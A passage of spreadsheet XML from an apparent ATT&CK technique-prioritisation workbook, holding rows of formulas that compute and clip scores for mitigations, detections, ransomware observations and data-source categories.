      </c>
      <c r="AT95" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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96" spans="1:47" ht="34">
      <c r="A96" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B96" s="37">
        <f t="shared" si="1"/>
        <v>61.500052714285715</v>
      </c>
      <c r="C96" s="37" t="s">
        <v>364</v>
      </c>
      <c r="D96" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E96" s="37" t="s">
        <v>365</v>
      </c>
      <c r="F96" s="37">
        <v>1</v>
      </c>
      <c r="G96" s="37">
        <v>1</v>
      </c>
      <c r="H96" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I96" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J96" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K96" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L96" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M96" s="37">
        <v>0</v>
      </c>
      <c r="N96" s="56">
        <v>0</v>
      </c>
      <c r="O96" s="56">
        <v>0</v>
      </c>
      <c r="P96" s="56">
        <v>0</v>
      </c>
      <c r="Q96" s="56">
        <v>0</v>
      </c>
      <c r="R96" s="57"/>
      <c r="S96" s="57">
        <v>0</v>
      </c>
      <c r="T96" s="57" t="s">
        <v>366</v>
      </c>
      <c r="U96" s="57">
        <v>7</v>
      </c>
      <c r="V96" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.6666809523809531E-2</v>
      </c>
      <c r="W96" s="37">
        <v>7</v>
      </c>
      <c r="X96" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y96" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z96" s="37">
        <v>0</v>
      </c>
      <c r="AA96" s="37">
        <v>0</v>
      </c>
      <c r="AB96" s="37">
        <v>0</v>
      </c>
      <c r="AC96" s="37"/>
      <c r="AD96" s="50" t="s">
        <v>367</v>
      </c>
      <c r="AE96" s="37" t="str" cm="1">
        <f t="array" ref="AE96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF96" s="37">
        <v>92</v>
      </c>
      <c r="AG96" s="37" t="str" cm="1">
        <f t="array" ref="AG96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH96" s="37">
        <v>92</v>
      </c>
      <c r="AI96" s="37" t="str" cm="1">
        <f t="array" ref="AI96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD96)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ96" s="37">
        <v>92</v>
      </c>
      <c r="AK96" s="37" t="str" cm="1">
        <f t="array" ref="AK96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD96)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL96" s="37">
        <v>92</v>
      </c>
      <c r="AM96" s="37" t="str" cm="1">
        <f t="array" ref="AM96">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD96)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN96" s="37">
        <v>0</v>
      </c>
      <c r="AO96" s="37"/>
      <c r="AP96" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ96" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>20.500017571428572</v>
      </c>
      <c r="AR96" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS96" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT96" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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97" spans="1:47" ht="68">
      <c r="A97" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B97" s="37">
        <f t="shared" si="1"/>
        <v>725.57377399999996</v>
      </c>
      <c r="C97" s="37" t="s">
        <v>368</v>
      </c>
      <c r="D97" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E97" s="37"/>
      <c r="F97" s="37">
        <v>3</v>
      </c>
      <c r="G97" s="37">
        <v>6</v>
      </c>
      <c r="H97" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.44999999999999996</v>
      </c>
      <c r="I97" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J97" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K97" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L97" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M97" s="37">
        <v>1</v>
      </c>
      <c r="N97" s="56">
        <v>0</v>
      </c>
      <c r="O97" s="56">
        <v>23</v>
      </c>
      <c r="P97" s="56">
        <v>13</v>
      </c>
      <c r="Q97" s="56">
        <v>26</v>
      </c>
      <c r="R97" s="57" t="s">
        <v>370</v>
      </c>
      <c r="S97" s="57">
        <v>9</v>
      </c>
      <c r="T97" s="57" t="s">
        <v>371</v>
      </c>
      <c r="U97" s="57">
        <v>12</v>
      </c>
      <c r="V97" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.49523800000000001</v>
      </c>
      <c r="W97" s="37">
        <v>21</v>
      </c>
      <c r="X97" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y97" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z97" s="37">
        <v>62</v>
      </c>
      <c r="AA97" s="37">
        <v>0.62</v>
      </c>
      <c r="AB97" s="37">
        <v>0.62</v>
      </c>
      <c r="AC97" s="37"/>
      <c r="AD97" s="50" t="s">
        <v>372</v>
      </c>
      <c r="AE97" s="37" t="str" cm="1">
        <f t="array" ref="AE97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF97" s="37">
        <v>93</v>
      </c>
      <c r="AG97" s="37" t="str" cm="1">
        <f t="array" ref="AG97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD97)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH97" s="37">
        <v>93</v>
      </c>
      <c r="AI97" s="37" t="str" cm="1">
        <f t="array" ref="AI97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD97)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ97" s="37">
        <v>93</v>
      </c>
      <c r="AK97" s="37" t="str" cm="1">
        <f t="array" ref="AK97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD97)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL97" s="37">
        <v>93</v>
      </c>
      <c r="AM97" s="37" t="str" cm="1">
        <f t="array" ref="AM97">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD97)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN97" s="37">
        <v>0</v>
      </c>
      <c r="AO97" s="37">
        <v>5</v>
      </c>
      <c r="AP97" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ97" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>241.85792466666666</v>
      </c>
      <c r="AR97" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS97" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT97" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU9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28.911657698412697</v>
      </c>
    </row>
    <row r="98" spans="1:47" ht="51">
      <c r="A98" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B98" s="37">
        <f t="shared" si="1"/>
        <v>95.147547238095228</v>
      </c>
      <c r="C98" s="37" t="s">
        <v>373</v>
      </c>
      <c r="D98" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E98" s="37" t="s">
        <v>374</v>
      </c>
      <c r="F98" s="37">
        <v>1</v>
      </c>
      <c r="G98" s="37">
        <v>1</v>
      </c>
      <c r="H98" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I98" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J98" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K98" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L98" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M98" s="37">
        <v>0</v>
      </c>
      <c r="N98" s="56">
        <v>2</v>
      </c>
      <c r="O98" s="56">
        <v>8</v>
      </c>
      <c r="P98" s="56">
        <v>0</v>
      </c>
      <c r="Q98" s="56">
        <v>4</v>
      </c>
      <c r="R98" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S98" s="57">
        <v>3</v>
      </c>
      <c r="T98" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U98" s="57">
        <v>6</v>
      </c>
      <c r="V98" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238076190476191</v>
      </c>
      <c r="W98" s="37">
        <v>9</v>
      </c>
      <c r="X98" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y98" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z98" s="37">
        <v>14</v>
      </c>
      <c r="AA98" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB98" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC98" s="37"/>
      <c r="AD98" s="50" t="s">
        <v>377</v>
      </c>
      <c r="AE98" s="37" t="str" cm="1">
        <f t="array" ref="AE98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD98)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF98" s="37">
        <v>94</v>
      </c>
      <c r="AG98" s="37" t="str" cm="1">
        <f t="array" ref="AG98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH98" s="37">
        <v>94</v>
      </c>
      <c r="AI98" s="37" t="str" cm="1">
        <f t="array" ref="AI98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ98" s="37">
        <v>94</v>
      </c>
      <c r="AK98" s="37" t="str" cm="1">
        <f t="array" ref="AK98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL98" s="37">
        <v>94</v>
      </c>
      <c r="AM98" s="37" t="str" cm="1">
        <f t="array" ref="AM98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN98" s="37">
        <v>0</v>
      </c>
      <c r="AO98" s="37">
        <v>5</v>
      </c>
      <c r="AP98" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ98" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>31.715849079365075</v>
      </c>
      <c r="AR98" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS98" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT98" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU9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3.8947439380196518</v>
      </c>
    </row>
    <row r="99" spans="1:47" ht="34">
      <c r="A99" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B99" s="37">
        <f t="shared" si="1"/>
        <v>74.385641714285725</v>
      </c>
      <c r="C99" s="37" t="s">
        <v>378</v>
      </c>
      <c r="D99" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E99" s="37" t="s">
        <v>379</v>
      </c>
      <c r="F99" s="37">
        <v>1</v>
      </c>
      <c r="G99" s="37">
        <v>1</v>
      </c>
      <c r="H99" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I99" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J99" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K99" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L99" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M99" s="37">
        <v>0</v>
      </c>
      <c r="N99" s="56">
        <v>0</v>
      </c>
      <c r="O99" s="56">
        <v>0</v>
      </c>
      <c r="P99" s="56">
        <v>0</v>
      </c>
      <c r="Q99" s="56">
        <v>2</v>
      </c>
      <c r="R99" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S99" s="57">
        <v>3</v>
      </c>
      <c r="T99" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U99" s="57">
        <v>6</v>
      </c>
      <c r="V99" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.523790476190476E-2</v>
      </c>
      <c r="W99" s="37">
        <v>9</v>
      </c>
      <c r="X99" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y99" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z99" s="37">
        <v>2</v>
      </c>
      <c r="AA99" s="37">
        <v>0.02</v>
      </c>
      <c r="AB99" s="37">
        <v>0.02</v>
      </c>
      <c r="AC99" s="37"/>
      <c r="AD99" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE99" s="37" t="str" cm="1">
        <f t="array" ref="AE99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD99)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF99" s="37">
        <v>95</v>
      </c>
      <c r="AG99" s="37" t="str" cm="1">
        <f t="array" ref="AG99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH99" s="37">
        <v>95</v>
      </c>
      <c r="AI99" s="37" t="str" cm="1">
        <f t="array" ref="AI99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ99" s="37">
        <v>95</v>
      </c>
      <c r="AK99" s="37" t="str" cm="1">
        <f t="array" ref="AK99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL99" s="37">
        <v>95</v>
      </c>
      <c r="AM99" s="37" t="str" cm="1">
        <f t="array" ref="AM99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN99" s="37">
        <v>0</v>
      </c>
      <c r="AO99" s="37">
        <v>0</v>
      </c>
      <c r="AP99" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ99" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>24.795213904761908</v>
      </c>
      <c r="AR99" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS99" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT99" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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00" spans="1:47" ht="34">
      <c r="A100" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B100" s="37">
        <f t="shared" si="1"/>
        <v>75.166593333333338</v>
      </c>
      <c r="C100" s="37" t="s">
        <v>381</v>
      </c>
      <c r="D100" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E100" s="37" t="s">
        <v>382</v>
      </c>
      <c r="F100" s="37">
        <v>1</v>
      </c>
      <c r="G100" s="37">
        <v>1</v>
      </c>
      <c r="H100" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I100" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J100" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K100" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L100" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M100" s="37">
        <v>0</v>
      </c>
      <c r="N100" s="56">
        <v>0</v>
      </c>
      <c r="O100" s="56">
        <v>2</v>
      </c>
      <c r="P100" s="56">
        <v>0</v>
      </c>
      <c r="Q100" s="56">
        <v>0</v>
      </c>
      <c r="R100" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S100" s="57">
        <v>3</v>
      </c>
      <c r="T100" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U100" s="57">
        <v>6</v>
      </c>
      <c r="V100" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.523790476190476E-2</v>
      </c>
      <c r="W100" s="37">
        <v>9</v>
      </c>
      <c r="X100" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y100" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z100" s="37">
        <v>2</v>
      </c>
      <c r="AA100" s="37">
        <v>0.02</v>
      </c>
      <c r="AB100" s="37">
        <v>0.02</v>
      </c>
      <c r="AC100" s="37"/>
      <c r="AD100" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE100" s="37" t="str" cm="1">
        <f t="array" ref="AE100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD100)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF100" s="37">
        <v>96</v>
      </c>
      <c r="AG100" s="37" t="str" cm="1">
        <f t="array" ref="AG100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH100" s="37">
        <v>96</v>
      </c>
      <c r="AI100" s="37" t="str" cm="1">
        <f t="array" ref="AI100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ100" s="37">
        <v>96</v>
      </c>
      <c r="AK100" s="37" t="str" cm="1">
        <f t="array" ref="AK100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL100" s="37">
        <v>96</v>
      </c>
      <c r="AM100" s="37" t="str" cm="1">
        <f t="array" ref="AM100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN100" s="37">
        <v>0</v>
      </c>
      <c r="AO100" s="37">
        <v>0</v>
      </c>
      <c r="AP100" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ100" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>25.055531111111112</v>
      </c>
      <c r="AR100" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS100" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT100" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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01" spans="1:47" ht="34">
      <c r="A101" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B101" s="37">
        <f t="shared" si="1"/>
        <v>72.242783047619042</v>
      </c>
      <c r="C101" s="37" t="s">
        <v>383</v>
      </c>
      <c r="D101" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E101" s="37" t="s">
        <v>384</v>
      </c>
      <c r="F101" s="37">
        <v>1</v>
      </c>
      <c r="G101" s="37">
        <v>1</v>
      </c>
      <c r="H101" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I101" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
